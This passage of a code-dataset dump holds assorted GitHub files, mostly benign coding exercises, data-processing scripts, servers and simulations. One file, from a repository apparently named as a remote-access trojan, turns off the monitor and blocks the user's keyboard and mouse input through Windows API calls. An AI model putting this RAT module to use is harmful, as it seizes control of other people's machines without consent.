enumerate(sorted(calorie, reverse=True)):\n calories += (2 ** i * c)\n return calories\n\n\nif __name__ == \"__main__\":\n assert marcs_cakewalk([5, 10, 7]) == 44\n assert marcs_cakewalk([1, 3, 2]) == 11\n assert marcs_cakewalk([7, 4, 9, 6]) == 79\n","repo_name":"kcc3/hackerrank-solutions","sub_path":"problem_solving/python/algorithms/greedy/marcs_cakewalk.py","file_name":"marcs_cakewalk.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72534520694","text":"def toggle_m():\r\n import ctypes\r\n import time\r\n HWND_BROADCAST = 0xFFFF\r\n WM_SYSCOMMAND = 0x0112\r\n SC_MONITORPOWER = 0xF170\r\n MONITOR_OFF = 2\r\n MONITOR_ON = -1\r\n def set_monitor_power(on):\r\n hwnd = ctypes.windll.user32.GetForegroundWindow()\r\n ctypes.windll.user32.PostMessageW(hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, MONITOR_ON if on else MONITOR_OFF)\r\n def block_input_events(block):\r\n user32 = ctypes.windll.user32\r\n user32.BlockInput(block)\r\n set_monitor_power(False)\r\n block_input_events(True)\r\n time.sleep(10)\r\n block_input_events(False)\r\n set_monitor_power(True)\r\n\r\n","repo_name":"VenomTheLostOne/C2-FUN.rat","sub_path":"toggle_m_power.py","file_name":"toggle_m_power.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41760464236","text":"import ccdc.molecule\n\ndef get_largest_components(m):\n s = []\n for c in m.components:\n n = len(c.atoms)\n id_n = int(str(c.identifier))\n l = [(n, id_n)]\n s.append(l)\n t = sorted(s, key=lambda k: k[0])\n largest_id = t[-1][0][1] - 1\n\n return largest_id\n\ndef remove_waters(m):\n keep = []\n waters = 0\n for s in m.components:\n ats = [at.atomic_symbol for at in s.atoms]\n if len(ats) == 3:\n ats.sort()\n if ats[0] == 'H' and ats[1] == 'H' and ats[2] == 'O':\n waters += 1\n else:\n keep.append(s)\n else:\n keep.append(s)\n new = ccdc.molecule.Molecule(m.identifier)\n for k in keep:\n new.add_molecule(k)\n return new\n\ndef remove_single_oxygen(m):\n keep = []\n waters = 0\n for s in m.components:\n ats = [at.atomic_symbol for at in s.atoms]\n if len(ats) == 1:\n ats.sort()\n if ats[0] == 'O':\n waters += 1\n else:\n keep.append(s)\n else:\n keep.append(s)\n new = ccdc.molecule.Molecule(m.identifier)\n for k in keep:\n new.add_molecule(k)\n return new\n","repo_name":"Matgen-project/MOFNet","sub_path":"process/tools/remove_waters.py","file_name":"remove_waters.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"38609780217","text":"from dict_mysql import SerDatabase\nfrom socket import *\nfrom multiprocessing import Process\nfrom time import sleep\n\n\nclass Handle:\n def __init__(self):\n self.__userdata = SerDatabase()\n\n def enroll(self, sock, data_list):\n if data_list[1] == \"U\":\n if self.__userdata.juge_user(data_list[2]):\n sock.send(b\"ok\")\n else:\n sock.send(b\"fail\")\n elif data_list[1] == \"P\":\n self.__userdata.storage_user(data_list[2], data_list[3])\n sock.send(\"注册成功\".encode())\n\n def login(self, sock, data_list):\n name = data_list[1]\n password = data_list[2]\n if self.__userdata.juge_user(name):\n sock.send(b\"n_wrong\")\n else:\n if self.__userdata.juge_passwd(name, password):\n sock.send(b\"ok\")\n else:\n sock.send(b\"p_wrong\")\n\n def find(self, sock, data_list):\n word = data_list[1]\n mean = self.__userdata.word_mean(word)\n if mean:\n sock.send(mean.encode())\n else:\n sock.send(b\"fail\")\n self.__userdata.sto_history(data_list[-1], word)\n\n def history(self, sock, data_list):\n tuple_his = self.__userdata.select_his(data_list[1])\n if tuple_his:\n for his in tuple_his:\n sleep(0.1)\n sock.send(str(his).encode())\n else:\n sock.send(\"目前无查询记录\".encode())\n sleep(0.1)\n sock.send(b\"done\")\n\n def request(self, sock, data):\n data_list = data.decode().split(\" \", 3)\n if data_list[0] == \"ENROLL\":\n self.enroll(sock, data_list)\n elif data_list[0] == \"LOGIN\":\n self.login(sock, data_list)\n elif data_list[0] == \"FIND\":\n self.find(sock, data_list)\n elif data_list[0] == \"HIS\":\n self.history(sock, data_list)\n elif data_list[0] == \"EXIT\":\n sock.close()\n\n\nclass SerProcess(Process):\n def __init__(self, sock):\n super().__init__(daemon=True)\n self.sock = sock\n self.__handle = Handle()\n\n def run(self):\n while True:\n data = self.sock.recv(1024)\n if data == b\"EXIT \":\n self.sock.close()\n break\n self.__handle.request(self.sock, data)\n\n\nclass Server:\n def __init__(self, addr=(\"0.0.0.0\", 8888)):\n self.addr = addr\n self.__tcpsock = socket()\n self.__bind()\n self.__litsen()\n\n def __bind(self):\n self.__tcpsock.bind(self.addr)\n\n def __litsen(self):\n self.__tcpsock.listen(5)\n\n def main(self):\n while True:\n try:\n client, addr = self.__tcpsock.accept()\n print(addr, \"has connected.\")\n except KeyboardInterrupt:\n self.__tcpsock.close()\n return\n p = SerProcess(client)\n p.start()\n\n\nif __name__ == '__main__':\n ser = Server()\n ser.main()\n","repo_name":"Vuthur/project_dict","sub_path":"dict_online.py","file_name":"dict_online.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31803117774","text":"from moviepy.editor import VideoFileClip\nfrom moviepy.editor import ImageSequenceClip\nimport cv2\nimport glob\nimport argparse\nimport numpy as np\nimport sys\nfrom utils import show_images\nfrom camera_cal import Camera\nfrom perspective import Transform\nfrom lanes import Lane\n\ndef progress(count, total, suffix=''):\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[{}] {}{} ...{}\\r'.format(bar, percents, '%', suffix))\n sys.stdout.flush()\n\ndef draw(warped, left_fit, right_fit, Minv, undist):\n # Generate x and y values for plotting\n ploty = np.linspace(0, warped.shape[0]-1, warped.shape[0] )\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n # Create an image to draw the lines on\n color_warp = np.zeros_like(warped).astype(np.uint8)\n # color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (undist.shape[1], undist.shape[0]))\n # Combine the result with the original image\n result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n\n return result\n\ndef add_text(img, left_curverad, right_curverad, center_offset_meters):\n # Add info about radius and offset\n font = cv2.FONT_HERSHEY_SIMPLEX\n text1 = 'left_curverad {:5.2f} meters - right_curverad: {:5.2f}'.format(left_curverad, right_curverad)\n if center_offset_meters < 0:\n text2 = 'offset: {:2.3f} meters to the left'.format(abs(center_offset_meters))\n else:\n text2 = 'offset: {:2.3f} meters to the right'.format(abs(center_offset_meters))\n\n cv2.putText(img, text1, (50, 30), font, 1, (0,0,255), 1, cv2.LINE_AA)\n cv2.putText(img, text2, (50, 70), font, 1, (0,0,255), 1, cv2.LINE_AA)\n\n return result\n\nif __name__ == '__main__':\n \"\"\"\n PARAMETERS, UTILS AND PATHS\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--caldir', type=str, default='camera_cal', \n help='directory to read calibration image files from')\n parser.add_argument('--dir', type=str, default='test_images', \n help='directory to read test image files from')\n parser.add_argument('--outputdir', type=str, default='frames', \n help='directory to write images to')\n parser.add_argument('--debug', type=int, default=0, \n help='print images to screen')\n FLAGS, unparsed = parser.parse_known_args()\n\n clip = VideoFileClip(\"project_video.mp4\")\n frames = int(clip.fps * clip.duration)\n image_folder = FLAGS.outputdir\n video_file = 'processed_video.mp4'\n\n # pixel to meters conversion\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n pxl_to_meters_radius_ratio = 3.05\n\n camera = Camera(FLAGS.caldir)\n transform = Transform(camera, Transform.DEFAULT_SRC, Transform.DEFAULT_DEST)\n\n \"\"\"\n Loop over all frames:\n - Convert image to birdseye view (includes undistort, threshold mask binary)\n - Detect lanes and smooth between frames (Fit a second order polynomial to each lane, Calculate curves and vehicle offset)\n - Draw lanes and add text\n - Save frame\n\n \"\"\"\n lane = None\n print('Processing video...')\n for idx, frame in enumerate(clip.iter_frames()):\n progress(idx+1, frames)\n warped, mask = transform.birdseye(frame)\n\n # Detect lanes and smooth between frames\n if lane is None:\n lane = Lane(camera, transform, warped)\n else:\n lane.advance_next_lane(warped)\n\n\n # Draw_lanes\n lane_image = lane.draw_lane(frame)\n\n # save frame\n if FLAGS.debug == 1:\n show_images(frame, lane_image)\n else :\n cv2.imwrite('{}/frame_{:010d}.jpg'.format(image_folder, idx), cv2.cvtColor(lane_image, cv2.COLOR_BGR2RGB))\n print('')\n","repo_name":"jfrattarola/CarND-Advanced-Lane-Lines","sub_path":"process_video.py","file_name":"process_video.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21307356322","text":"import tensorflow as tf\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import fetch_california_housing\nimport pandas as pd\nfrom tensorflow import keras\nimport os\n\n\ndef f(x):\n return 3.*x**2+2.*x-1\ndef approximate_derivative(f, x, eps=1e-3):\n return (f(x + eps) - f(x - eps)) / (2. * eps)\n\nprint(approximate_derivative(f, 1))\n\n\ndef g(x1, x2):\n return (x1 + 5) * (x2 ** 2)\n\ndef approximate_gradient(g, x1, x2, eps=1e-3):\n gd_x1 = approximate_derivative(lambda x : g(x, x2), x1, eps)\n gd_x2 = approximate_derivative(lambda x : g(x1, x), x2, eps)\n return gd_x1, gd_x2\nprint(approximate_gradient(g, 2., 3.))\n\n# # 使用tensorflow一个一个求导\n# x1 = tf.Variable(2.0)\n# x2 = tf.Variable(3.0)\n# with tf.GradientTape(persistent=True) as tape: # 如果不设置persistent=True,在一次求导后tape会被自动消解,不能使用第二次,设置True后需要手动删除tape对象\n# z = g(x1, x2)\n#\n# dz_x1 = tape.gradient(z, x1)\n# try:\n# dz_x2 = tape.gradient(z, x2)\n# except RuntimeError as ex:\n# print(ex)\n#\n# del tape\n\n\n# 使用tensorflow一起求导(梯度)\nx1 = tf.Variable(2.0)\nx2 = tf.Variable(3.0)\nwith tf.GradientTape() as tape:\n z = g(x1, x2)\n\ndz_x = tape.gradient(z, [x1, x2])\nprint(dz_x)\n\n# 对常量求导\nx1 = tf.constant(2.0)\nx2 = tf.constant(3.0)\nwith tf.GradientTape() as tape:\n tape.watch(x1) # 当对常量求偏导是需要加这句话\n tape.watch(x2)\n z = g(x1, x2)\n\ndz_x = tape.gradient(z, [x1, x2])\nprint(dz_x)\n\n\n# 对个目标函数对同一个x求导\nx = tf.Variable(5.0)\nwith tf.GradientTape() as tape:\n z1 = 3 * x\n z2 = x ** 2\nprint(tape.gradient([z1, z2], x)) # 得到z1对x的导数加z2对x的导数\n\n\n# 求二阶导数\nx1 = tf.Variable(2.0)\nx2 = tf.Variable(3.0)\nwith tf.GradientTape(persistent=True) as outer_tape:\n with tf.GradientTape(persistent=True) as inner_tape:\n z = g(x1, x2)\n inner_grads = inner_tape.gradient(z, [x1, x2])\nouter_grads = [outer_tape.gradient(inner_grad, [[x1, x2]])\n for inner_grad in inner_grads]\ndel inner_tape\ndel outer_tape\n\n# 手动实现梯度下降\nlearning_rate = 0.01\nx = tf.Variable(0.0)\n\nfor _ in range(100):\n with tf.GradientTape() as tape:\n z = f(x)\n gd_dx = tape.gradient(z, x)\n x.assign_sub(learning_rate * gd_dx)\nprint(x)\n\n\n# gradienttape结合keras optimizer\nlearning_rate = 0.01\nx = tf.Variable(0.0)\n\noptimizer = keras.optimizers.SGD(lr=learning_rate)\nfor _ in range(100):\n with tf.GradientTape() as tape:\n z = f(x)\n gd_dx = tape.gradient(z, x)\n # x.assign_sub(learning_rate * gd_dx)\n optimizer.apply_gradients([(gd_dx, x)])\nprint(x)","repo_name":"kanandian/machine_learning","sub_path":"tensorflow_learning_and_practice/charter3/4tf_diffs.py","file_name":"4tf_diffs.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43629261454","text":"#!/usr/bin/env python3\nfrom classes.__init__ import CONN, CURSOR\nimport ipdb \n\nfrom classes.beach import Beach\nfrom classes.surfboard import Surfboard\nfrom classes.surfer import Surfer\nfrom classes.wave import Wave\n\nSurfer.drop_table()\nSurfboard.drop_table()\nWave.drop_table()\nBeach.drop_table()\n\nSurfer.create_table()\nSurfboard.create_table()\nWave.create_table()\nBeach.create_table()\n\n# Surfer.find_by_name()\n# Beach.find_by_name()\n\n# Surfboard.find_all()\n# Surfer.find_all()\n# Wave.find_all()\n\n\n\n# Surfboard.find_by_id()\n# Surfer.find_by_id()\n# Wave.find_by_id()\n# Beach.find_by_id()\n\n#surfers\nsurfer1 = Surfer.create('River', 'Ferguson', 26, 'Get Pitted')\nsurfer2 = Surfer.create('Caz', 'Mozeleski', 28, 'Hotdogger')\nsurfer3 = Surfer.create('Guy', 'buddy', 30, 'beat it kook')\nsurfer4 = Surfer.create('Buddy', 'Guy', 22, \"Hey Guyyy\")\nsurfer5 = Surfer.create('Craig', 'Dude', 22, \"Stoked\")\n\n#Surfboard\nboard1 = Surfboard.create('Al Merrick', 'Shortboard', 'Flyer', surfer1.id)\nboard2 = Surfboard.create('Takayama', 'Longboard', 'Noserider', surfer2.id)\nboard3 = Surfboard.create('Santa Cruz', 'Mid Length', 'Egg', surfer3.id)\nboard4 = Surfboard.create('Lost', 'Mid Length', 'Mayhem', surfer3.id)\nboard5 = Surfboard.create('Arakawa', 'Shortboard', 'Carver', surfer5.id)\nboard6 = Surfboard.create('Tokoro', 'Longboard', 'Spooner', surfer4.id)\nboard7 = Surfboard.create('Aipa', 'Shortboard', 'Islander', surfer1.id)\n\n#waves\nwave1 = Wave.create(10, 'Mean', 10, 10)\nwave2 = Wave.create(9, 'localized', 9, 10)\nwave3 = Wave.create(8, 'Super localized', 5, 4)\nwave4 = Wave.create(7, 'Worst locals ever', 10, 10)\n\n\n#beaches\nbeach1 = Beach.create('Pipeline', 'Hawaii', 10, wave1.id, surfer1.id)\nbeach2 = Beach.create('Sunset Beach', 'Hawaii', 9, wave2.id, surfer5.id)\nbeach3 = Beach.create('Velzy Land', 'Hawaii', 7, wave3.id, surfer3.id)\nbeach4 = Beach.create('Dirt Bags', 'California', 3, wave4.id, surfer2.id)\n\nprint('Debugger')\n\n\n\n#ipdb.set_trace()","repo_name":"riverferguson/surfer-project","sub_path":"lib/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71854127466","text":"import xlrd \nimport matplotlib.pyplot as plt\nimport numpy as np\n\noutput_path = \"/Users/luochen/Documents/Research/papers/rebalance/\"\n\nfont_size = 10\nfont_weight = 100\nlabel_size = 11\ntitle_size = 11\nlegend_size = 11\nparams = {\n 'font.family': 'Times New Roman',\n 'font.weight': font_weight,\n 'axes.labelweight': font_weight,\n 'figure.titleweight': font_weight,\n 'axes.titlesize': title_size,\n 'axes.labelsize': label_size,\n 'legend.fontsize': legend_size,\n 'xtick.labelsize': label_size,\n 'ytick.labelsize': label_size,\n 'font.size': font_size,\n 'lines.linewidth':1,\n 'lines.markeredgewidth': 0,\n 'lines.markersize':5,\n \"legend.handletextpad\":0.2,\n \"legend.handlelength\":1.5,\n 'text.usetex': False,\n 'savefig.bbox':'tight',\n 'savefig.pad_inches':0,\n 'figure.figsize':(3.25, 2.3),\n \"legend.fancybox\":True,\n \"legend.shadow\":False,\n \"legend.framealpha\":0,\n \"legend.labelspacing\":0.2,\n \"legend.columnspacing\":0.5,\n \"legend.borderpad\":0.2,\n \"legend.borderaxespad\":0,\n \"hatch.color\":'white',\n \"hatch.linewidth\":'0.5',\n \"xtick.direction\": 'out',\n \"ytick.direction\": 'out',\n}\nplt.rcParams.update(params)\nplt.tight_layout()\n\nnames = [\"Hashing\", \"StaticHash\", \"DynaHash\", \"DynaHash-lazy-cleanup\"]\ncolors = ['tomato', 'dodgerblue', 'darkgray', 'orange']\n\n\nclass PlotOption(object):\n\n def __init__(self, x, y, legend='', color='black', linestyle='solid', marker=None, markevery=1, alpha=None, hatch=None, dashes=None):\n self.x = x\n self.y = y\n self.linestyle = linestyle\n self.marker = marker\n self.color = color\n self.legend = legend\n self.markevery = markevery\n self.alpha = alpha\n self.hatch = hatch\n self.dashes = dashes\n\n\ndef get_sub_sheet(sheet, row_begin, row_end, col_begin, col_end):\n rows = []\n for i in range(row_begin, row_end):\n rows.append(sheet.row_values(i, col_begin, col_end))\n return rows\n\n\nworkbook = xlrd.open_workbook(\"/Users/luochen/Documents/Research/experiments/results/rebalance/result.xlsx\")\n\nxlabel_nodes = \"Number of Nodes\"\nylabel_time = \"Time (Minutes)\"\nylabel_time_sec = \"Time (Seconds)\"\n","repo_name":"luochen01/storage-experiments","sub_path":"storage-experiments/src/edu/uci/asterixdb/storage/experiments/scripts/rebalance/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31080903725","text":"\"\"\"\nGiven a string, your task is to replace each of its characters\nby the next one in the English alphabet; i.e. replace a with b,\nreplace b with c, etc (z would be replaced by a).\n\"\"\"\n\ndef alphabetic_shift(input_string):\n new_string = \"\"\n for char in input_string:\n # convert char to ascii code equivalent using ord\n # increment the ascii_code by 1 and wrap around 'a' if it is 'z'\n # The % 26 is used to ensure that the shift remains within \n # the 26 letters of the lowercase alphabet. ord('a') is added \n # back to the result to obtain the new ASCII code of the shifted letter.\n new_ascii_code = (ord(char) - ord('a') + 1) % 26 + ord('a')\n # convert back to char and append to new_string\n new_string += chr(new_ascii_code)\n\n return new_string\n\n# Test Data\nprint(alphabetic_shift(\"crazy\"))\n","repo_name":"Levy-Naibei/algorithm-challenges","sub_path":"codesignal/alphabet_shift.py","file_name":"alphabet_shift.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71484969068","text":"import os\nimport logging\nfrom chibi.atlas import Chibi_atlas, Chibi_atlas_default\nfrom chibi.file import Chibi_path\nfrom chibi.file.other import Chibi_json, Chibi_yaml, Chibi_python\nimport chibi_donkey as donkey\n\n\nlogger = logging.getLogger( 'chibi.config.Configuration' )\n\n\n__all__ = [ 'Configuration' ]\n\n\ndef _default_factory():\n return Configuration()\n\n\nclass Configuration( Chibi_atlas_default ):\n def __init__( self, default_factory=None, *args, **kw ):\n if default_factory is None:\n default_factory = _default_factory\n super().__init__( default_factory, *args, **kw )\n\n def load( self, path ):\n path = Chibi_path( path )\n with path as f:\n if isinstance( f, ( Chibi_json, Chibi_yaml ) ):\n for k, v in f.read().items():\n self[ k ] = v\n elif isinstance( f, Chibi_python ):\n logger.info( f\"ejecutanto archivo python {f}\" )\n f.import_()\n else:\n raise NotImplementedError(\n \"no esta implementado la carga de configuracion de los \"\n f\"archivos {type(f)} de {f}\" )\n\n\nclass Logger_configuration( Chibi_atlas ):\n def __getitem__( self, name ):\n try:\n return super().__getitem__( name )\n except KeyError:\n # logger = logging.getLogger( name )\n self[ name ] = Logger( name=name )\n return super().__getitem__( name )\n\n\nclass Logger( Chibi_atlas ):\n @property\n def level( self ):\n logger = self.logger\n while logger:\n if logger.level != logging.NOTSET:\n return logger.level\n logger = logger.parent\n return self.logger.level\n\n @level.setter\n def level( self, value ):\n if isinstance( value, str ):\n level = getattr( logging, value )\n if isinstance( level, int ):\n self.logger.setLevel( level )\n else:\n raise NotImplementedError(\n f\"no esta implementado la asignacion del level de {value}\"\n )\n elif isinstance( value, int ):\n self.logger.setLevel( value )\n else:\n raise NotImplementedError(\n f\"no esta implementado la asignacion del level de {value}\" )\n\n @property\n def logger( self ):\n return logging.getLogger( self.name )\n\n\nclass Env_vars( Configuration ):\n def __init__( self, default_factory=None, *args, **kw ):\n if default_factory is None:\n default_factory = str\n d = donkey.inflate( os.environ )\n super().__init__( default_factory, d, *args, **kw )\n","repo_name":"dem4ply/chibi","sub_path":"chibi/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35433953187","text":"curr = 0\npoints = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n \"A\": 1,\n \"B\": 2,\n \"C\": 3\n}\n# winning_comb = [\"CX\", \"BZ\", \"AY\"]\nwinning_comb = {\n \"C\": \"X\",\n \"B\": \"Z\",\n \"A\": \"Y\"\n}\n# eq = [\"AX\", \"BY\", \"CZ\"]\nloosing_comb = {\n \"A\": \"Z\",\n \"B\": \"X\",\n \"C\": \"Y\"\n}\nwhile True:\n try:\n a = input().split()\n if a[1] == \"Y\":\n curr += points[a[0]] + 3\n else:\n if a[1] == \"Z\":\n curr += points[winning_comb[a[0]]] + 6\n else:\n curr += points[loosing_comb[a[0]]]\n except EOFError:\n break\n\nprint(curr)\n","repo_name":"mclarammd/aoc","sub_path":"aoc-2_1.py","file_name":"aoc-2_1.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38572007814","text":"# -*- coding: utf-8 -*-\n__author__ = 'jsz'\n__version__ = 0.1\n\n\nimport web\nimport json\n\nfrom search_engine import SearchService\nfrom search_engine import FacetEncoder\nfrom models import BookEncoder\n\n# APIs exposed to front end\nurls = (\n \"/keyWordsSearch\",\"KeyWordsSearch\",\n \"/facetSearch\",\"FacetSearch\",\n \"/expandSearch\",\"ExpandSearch\",\n \"/defineSearch\",\"DefineSearch\",\n \"/historySummary\",\"HistorySummary\",\n \"/(.*)\", \"Index\"\n )\n\n\napp = web.application(urls, globals())\n\n\nclass Index:\n\n def GET(self, url):\n u\"\"\"\n :param url: needs, or will throw exception\n \"\"\"\n raise web.redirect('/static/web-angular/app/index.html')\n\n\ndef json_encoder(search_result):\n result = {\n 'facets': json.loads(json.dumps(search_result.facets, cls=FacetEncoder)),\n 'content': json.loads(json.dumps(search_result.content, cls=BookEncoder))\n }\n return json.dumps(result)\n\n\nclass KeyWordsSearch:\n\n def GET(self):\n u\"\"\"\n 关键词搜索后台接口\n :param key_word: String 从前台获取关键词进行搜索\n :return: SearchResult 关键词搜索结果集\n \"\"\"\n \n key_words_str = web.input()['key_words']\n key_words = key_words_str.split()\n \n ip = web.ctx.ip\n service = SearchService.get_service_by_ip(ip)\n search_result = service.key_words_search(key_words)\n return json_encoder(search_result)\n\nclass FacetSearch:\n\n def GET(self):\n u\"\"\"\n 分面搜索接口\n :param new_attr: int 新增分面属性\n :return SearchResult 分面搜索结果集\n \"\"\"\n new_attr = int(web.input()['new_attr'])\n\n ip = web.ctx.ip\n service = SearchService.get_service_by_ip(ip)\n search_result = service.facet_search(new_attr)\n return json_encoder(search_result)\n\nclass ExpandSearch:\n\n def GET(self):\n u\"\"\"\n 根据当前查询节点进行泛化\n :param degree: float 泛化程度 取值0~1 \n :return: SearchResult 泛化搜索结果集\n \"\"\"\n return \"ExpandSearch\"\n\n\nclass DefineSearch:\n\n def GET(self):\n u\"\"\"\n 根据当前查询节点进行细化\n :param degree: float 细化程度 取值0~1 \n :return: SearchResult 细化搜索结果集\n \"\"\"\n return \"DefineSearch\"\n\n\nclass HistorySummary:\n\n def GET(self):\n u\"\"\"\n 根据查询历史推荐结果\n :return: SearchResult 历史查询推荐结果集\n \"\"\"\n return \"HistorySummary\"\n \n \nif __name__ == '__main__':\n app.run()\n","repo_name":"zeal4u/FCA_Faceted_Search","sub_path":"bin/web_backend.py","file_name":"web_backend.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2320655747","text":"\nfrom pulse_lib.tests.configurations.test_configuration import context\nimport pulse_lib.segments.utility.looping as lp\n\ndef test():\n pulse = context.init_pulselib(n_gates=2)\n\n n_pulses = lp.array([1,2,4,9], axis=0, name='n_pulses')\n\n s = pulse.mk_segment()\n\n context.segment = s\n\n s.P1.update_dim(n_pulses)\n for i,n in enumerate(n_pulses):\n p1 = s.P1[i]\n for _ in range(int(n)):\n p1.add_ramp_ss(0, 100, -80, 80)\n p1.reset_time()\n\n s.P2.add_block(0, 100, 60)\n\n for i in range(len(n_pulses)):\n context.plot_segments([s], index=[i])\n\n sequence = pulse.mk_sequence([s])\n context.add_hw_schedule(sequence)\n for n in sequence.n_pulses.values:\n sequence.n_pulses(n)\n context.plot_awgs(sequence, ylim=(-0.100,0.100))\n\n return None\n\nif __name__ == '__main__':\n ds = test()\n","repo_name":"stephanlphilips/pulse_lib","sub_path":"pulse_lib/tests/looping/test_segment_update_dim.py","file_name":"test_segment_update_dim.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11408979524","text":"import numpy as np\nimport torch, csv\n\n\ndef bead_spring(data_id, n_sample, dim=2, dt=10**(-3), T_ratio=0.1, m_error=0, rand_seed=0):\n np.random.seed(rand_seed)\n k = 1\n g = 1\n Th = 250\n Tc = Th*T_ratio\n A = np.identity(dim) * (-2*k/g)\n D = np.zeros((dim, dim))\n for i in range(dim):\n if(i+1 < dim):\n A[i, i+1] += k/g\n if(i-1 >= 0):\n A[i, i-1] += k/g\n D[i, i] = Th/g - (Th-Tc)/g/(dim-1)*i\n x0 = np.zeros(dim)\n x = np.zeros((n_sample+1, dim))\n obs = np.zeros((n_sample+1, dim))\n\n # Relaxation\n for i in range(100000):\n x0 = x0 + dt*np.matmul(x0, A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt))\n x[0, :] = x0\n obs[0, :] = x0 + np.random.normal(0,1,dim)*m_error\n\n # Generate trajectory data\n for i in range(n_sample):\n x[i+1,:] = x[i,:] + dt*np.matmul(x[i,:], A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt))\n obs[i+1,:] = x[i+1,:] + np.random.normal(0,1,dim)*m_error # Add measurement error\n np.savetxt('Data/data' + str(data_id) + '.txt', obs)\n\n # Calculate the true entropy production rate\n cov = np.identity(dim)\n for i in range(100000):\n cov += (np.matmul(A, cov) + np.matmul(cov, A.T) + 2*D)*dt\n true_value = np.trace(np.einsum('ij,jk,kl,lm->im', A, np.linalg.inv(D), A, cov)\n - np.einsum('ij,jk->ik', np.linalg.inv(cov), D))\n print('True entropy production rate : ' + '{:.4f}'.format(true_value))\n\n\ndef Mexican_hat(data_id, n_sample, dt=10**(-4), nonlinear=100, m_error=0, rand_seed=0):\n np.random.seed(rand_seed)\n dim = 2\n k = 1\n g = 1\n Th = 250\n Tc = 25\n A = np.identity(dim) * (-2*k/g)\n D = np.zeros((dim, dim))\n for i in range(dim):\n if(i+1 < dim):\n A[i, i+1] += k/g\n if(i-1 >= 0):\n A[i, i-1] += k/g\n D[i, i] = Th/g - (Th-Tc)/g/(dim-1)*i\n x0 = np.zeros(dim)\n x = np.zeros((n_sample+1, dim))\n obs = np.zeros((n_sample+1, dim))\n\n # Relaxation\n for i in range(100000):\n x0 = (x0 + dt*np.matmul(x0, A)\n - dt*nonlinear*(4*np.sum(x0**2)-2)*x0 + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt)))\n x[0, :] = x0 \n obs[0, :] = x0 + np.random.normal(0,1,dim)*m_error\n\n # Generate trajectory data\n for i in range(n_sample):\n x[i+1,:] = (x[i,:] + dt*np.matmul(x[i,:], A)\n - dt*nonlinear*(4*np.sum(x[i,:]**2)-2)*x[i,:] + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt)))\n obs[i+1,:] = x[i+1,:] + np.random.normal(0,1,dim)*m_error # Add measurement error\n np.savetxt('Data/data' + str(data_id) + '.txt', obs)\n\n\ndef breathing_parabola(data_id, n_traj, n_sample, dt=10**(-2), m_error=0, t_error=0, rand_seed=0):\n np.random.seed(rand_seed)\n dim = 1\n time_shift = 0\n x0 = np.zeros(dim)\n x0_tmp = np.zeros(dim)\n x = np.zeros((n_sample+1, dim))\n obs = np.zeros((n_sample+1, dim+1))\n output_file = open('Data/data' + str(data_id) + '.txt', 'w')\n output_writer = csv.writer(output_file, delimiter=' ')\n\n # Relaxation\n for i in range(10000):\n x0 = x0 - dt*x0 + np.random.normal(0,1,dim) * np.sqrt(2*dt) \n \n # Generate trajectory data\n for i in range(n_traj):\n # Relaxation\n for j in range(100):\n x0 = x0 - dt*x0 + np.random.normal(0,1,dim) * np.sqrt(2*dt)\n x0_tmp[:] = x0\n\n # Synchronization error\n if t_error > 0:\n time_shift = 